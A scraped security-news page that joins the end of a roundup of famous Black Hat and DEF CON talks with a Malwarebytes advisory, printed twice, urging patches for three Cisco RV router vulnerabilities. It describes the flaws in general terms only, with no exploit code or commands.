Cisco initially gave the go-ahead for the talk but had second thoughts with the event imminent. ISS agreed to a request from the networking giant, but Lunn disagreed. This prompted his decision to resign in order to present his findings.

**Cache from chaos**

Dan Kaminsky’s reveal of a cache poisoning flaw affecting the software of multiple DNS vendors back in 2008 remains a landmark event in networking security.

The security researcher worked with DNS vendors for months to fix the critical vulnerability before laying the problem bare during Black Hat 2008.

It remains a testament to the late security researcher, who sadly passed away in April 2021, prompting an outpouring of tributes to a true infosec great characterized by “kindness, boundless energy, and positivity”.

**Hitting the Jackpot**

Barnaby Jack’s live hack demo on an ATM set the benchmark for spectacular hacks and cutting-edge security research. Jackpotting – as the attack later became known – involved a targeted assault on the software running on ATMs.

The end result involved injecting malware into the operating system of cash dispensing machines, causing them to dish out bank notes fraudulently. Either exploitable vulnerabilities in an ATM’s remote management system or unauthorised physical access to a machine (perhaps facilitated by a corrupt insider) might be used to carry out an attack.

Prior to Jack’s research, embedded systems such as ATMs were widely (but incorrectly) thought to be beyond the scope of potential hack attacks. The research paved the road to follow-up studies into the security of medical devices such as pacemakers and insulin pumps.

**Up in the air**

Interest in the security of air traffic control systems took off with Andrei Costin’s presentation on the issue during Black Hat 2012. Costin’s talk focused on security aspects of ADS-B (Automatic Dependent Surveillance-Broadcast), a satellite-based aircraft tracking technology, and other flight technologies.

The presentation looked at ADS-B (in)security from a practical perspective, presenting the “feasibility and techniques of how potential attackers could play with generated/injected air traffic, and as such potentially opening new attack surface” into air traffic control systems.

**Don’t look up**

Shifting the focus from airborne planes to satellites in orbit, a well-received 2014 talk by Ruben Santamarta reviewed the security of satellite communication terminals.

IOActive found that all the devices they accessed were potentially open to abuse. The vulnerabilities uncovered included multiple backdoors, hardcoded credentials, undocumented and/or insecure protocols, or weak encryption algorithms.

“These vulnerabilities allow remote, unauthenticated attackers to fully compromise the affected products,” IOActive warned at the time. “In certain cases, no user interaction is required to exploit the vulnerability, just sending a simple SMS or specially crafted message from one ship to another ship can do it.”

**Policy forum**

Black Hat and DEF CON have never been the forum for technical discussions and hacking demos alone. Policy issues are often in play too, as evidenced by talks from the likes of Dan Geer and Jennifer Granick.

Geer, CISO for In-Q-Tel, a not-for-profit venture capitalist firm that looks for tech that supports the US intelligence community, spoke about cyberspace as a domain for conflict between nations and on power politics in 2014.

Granick, director of civil liberties at the Stanford Center for Internet and Society, looked forward to the next phases of the development of the internet in 2015.

More recently Parisa Tabriz, director of engineering at Google, used her 2018 Black Hat keynote to give a practical perspective on secure development. And last year Jen Easterly, director of the Cybersecurity and Infrastructure Security Agency (CISA), outlined how hackers, the government, and the private sector can work together to confront cyber threats.

**Kettle reinvents HTTP request smuggling**

PortSwigger’s James Kettle reinvented the long-neglected topic of request smuggling with his presentation on HTTP desync attacks at DEF CON in 2019.

Kettle showed how it was possible to manipulate web requests in order to poison web caches. The hack allowed Kettle to compromise PayPal’s login page, among other targets, and claim $70K in bug bounties.

The hack relied in exploiting flaws in how web systems pass web-based requests between front end and back end system, as explained in a Daily Swig article published at the time of the talk.

**A new era in SSRF**

Noted web security researcher Orange Tsai used a 2017 Black Hat talk to outline an exploit technique variant that might be harnessed to bypass server-side request forgery (SSRF) protections.

The technique relied on fuzzing to unearth previously undiscovered vulnerabilities in the libraries of programming languages including Python, PHP, Perl, Ruby, Java, JavaScript, Wget, and cURL.

The root cause of the problem lies in the inconsistency of URL parsers and URL requesters.

Flaws in web applications such as WordPress, vBulletin, MyBB, and GitHub have also been uncovered using the same approach, the security researcher told Black Hat USA attended in 2017.

**Hasta la Vista**

Polish security researcher Joanna Rutkowska became well known in the security community following her demonstration of an attack against Windows Vista’s kernel protection mechanism at Black Hat USA 2006.

During the same presentation, she also demonstrated a technique called ‘Blue Pill’ that involved hacking the operation of a virtual machine to plant stealthy malware.

**Gone in 40ms**

Hacking took to the roads in 2015 after security researchers Charlie Millar and Chris Valasek demonstrated how to launch a remote cyber-attack against an unaltered factory vehicle.

The security researchers hacked into a Jeep Cherokee through a mobile connection to its entertainment system via a technique that allowed them to send messages on the CAN bus to critical electronic control units. This, in turn, allowed them to control the braking, steering, and acceleration of the car.

That’s our round-up of the best-ever talks at Hacker Summer Camp – but what are your picks?

Have we failed to mention any unmissable talks? What are your favourite hacks? Let us know on Twitter at @DailySwig.

You can also watch more talks from previous Hacker Summer Camps on YouTube, ranked by numbers of views, via the DEF CON and Black Hat archives.  

YOU MAY ALSO LIKE ParseThru: HTTP parameter smuggling flaw uncovered in several Go applications

The best Black Hat and DEF CON talks of all time

Cisco has released a security advisory about some serious security vulnerabilities in multiple Cisco small business VPN routers.
The post Patch now! Cisco VPN routers are vulnerable to remote control appeared first on Malwarebytes Labs.

Cisco has released a security advisory about several vulnerabilities in the Cisco Small Business RV series routers, covering the RV160, RV260, RV340, and RV345.

There are no workarounds available that address these vulnerabilities, so you need to patch.

**Vulnerabilities**

The vulnerabilities are dependent on one another—exploitation of one of the vulnerabilities may be required to exploit another vulnerability.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). You will find the ones included in these updates listed below.

**CVE-2022-20842**

CVE-2022-20842 is a vulnerability in the web-based management interface of the Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers. Exploitation of the vulnerability could allow an unauthenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition.

This vulnerability is due to insufficient validation of user-supplied input to the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP input to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a DoS condition.

**CVE-2022-20827**

CVE-2022-20827 is a vulnerability in the web filter database update feature of Cisco Small Business RV160, RV260, RV340, and RV345 series routers. Exploitation of the vulnerability could allow an unauthenticated, remote attacker to perform a command injection and execute commands on the underlying operating system with root privileges.

This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by submitting crafted input to the web filter database update feature.

**CVE-2022-20841**

CVE-2022-20841 is a vulnerability in the Open Plug and Play (PnP) module of Cisco Small Business RV160, RV260, RV340, and RV345 series routers. Exploitation of the vulnerability could allow an unauthenticated, remote attacker to inject and execute arbitrary commands on the underlying operating system.

This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious input to an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux operating system. To exploit this vulnerability, an attacker must leverage a machine-in-the-middle position or have an established foothold on a specific network device connected to the affected router.

**Input validation**

After reading the vulnerability descriptions above you may wonder what “input validation” means, since the absence of it seems to be one of the underlying issues.

As you probably suspected, input validation is the name for the checks that are done on data being added to a system. It is necessary to ensure only properly formed data enters the workflow in an information system. When a system does not properly validate its inputs, it gives threat actors a chance to attempt several attacks, depending on the type of system.

The most common type is SQL injection, an attack used against databases. SQL commands are a mixture of actions (code) and things being acted upon (data). The external inputs that feed into SQL commands should only ever be interpreted as data. If they are interpreted as code then an attacker can inject input that changes the behaviour of an application’s SQL commands.

Insufficient input validation could allow an attacker to execute SQL commands that could destroy your database or provide the attacker with data stored in the database.

**Mitigation**

There are no workarounds that address these vulnerabilities but Cisco has released free software updates for them. Cisco states it is not aware of any public announcements or malicious use of the vulnerabilities. So, now is your chance to install those updates before that changes.

A list of releases in which these vulnerabilities have been fixed is available in the Cisco Security Advisory.

Stay safe, everyone!

Patch now! Cisco VPN routers are vulnerable to remote control

Categories: Exploits and vulnerabilities
Categories: News
Tags: Cisco

Tags: VPN routers

Tags: CVE-2022-20842

Tags: CVE-2022-20827

Tags: CVE-2022-20841

Tags: input validation

Cisco has released a security advisory about some serious security vulnerabilities in multiple Cisco small business VPN routers.



(Read more...)




The post Patch now! Cisco VPN routers are vulnerable to remote control appeared first on Malwarebytes Labs.

Cisco has released a security advisory about several vulnerabilities in the Cisco Small Business RV series routers, covering the RV160, RV260, RV340, and RV345.

There are no workarounds available that address these vulnerabilities, so you need to patch.

**Vulnerabilities**

The vulnerabilities are dependent on one another—exploitation of one of the vulnerabilities may be required to exploit another vulnerability.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). You will find the ones included in these updates listed below.

**CVE-2022-20842**

CVE-2022-20842 is a vulnerability in the web-based management interface of the Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers. Exploitation of the vulnerability could allow an unauthenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition.

This vulnerability is due to insufficient validation of user-supplied input to the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP input to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a DoS condition.

**CVE-2022-20827**

CVE-2022-20827 is a vulnerability in the web filter database update feature of Cisco Small Business RV160, RV260, RV340, and RV345 series routers. Exploitation of the vulnerability could allow an unauthenticated, remote attacker to perform a command injection and execute commands on the underlying operating system with root privileges.

This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by submitting crafted input to the web filter database update feature.

**CVE-2022-20841**

CVE-2022-20841 is a vulnerability in the Open Plug and Play (PnP) module of Cisco Small Business RV160, RV260, RV340, and RV345 series routers. Exploitation of the vulnerability could allow an unauthenticated, remote attacker to inject and execute arbitrary commands on the underlying operating system.

This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious input to an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux operating system. To exploit this vulnerability, an attacker must leverage a machine-in-the-middle position or have an established foothold on a specific network device connected to the affected router.

**Input validation**

After reading the vulnerability descriptions above you may wonder what "input validation" means, since the absence of it seems to be one of the underlying issues.

As you probably suspected, input validation is the name for the checks that are done on data being added to a system. It is necessary to ensure only properly formed data enters the workflow in an information system. When a system does not properly validate its inputs, it gives threat actors a chance to attempt several attacks, depending on the type of system.

The most common type is SQL injection, an attack used against databases. SQL commands are a mixture of actions (code) and things being acted upon (data). The external inputs that feed into SQL commands should only ever be interpreted as data. If they are interpreted as code then an attacker can inject input that changes the behaviour of an application's SQL commands.

Insufficient input validation could allow an attacker to execute SQL commands that could destroy your database or provide the attacker with data stored in the database.

**Mitigation**

There are no workarounds that address these vulnerabilities but Cisco has released free software updates for them. Cisco states it is not aware of any public announcements or malicious use of the vulnerabilities. So, now is your chance to install those updates before that changes.

A list of releases in which these vulnerabilities have been fixed is available in the Cisco Security Advisory.

Stay safe, everyone!

Tag

#perl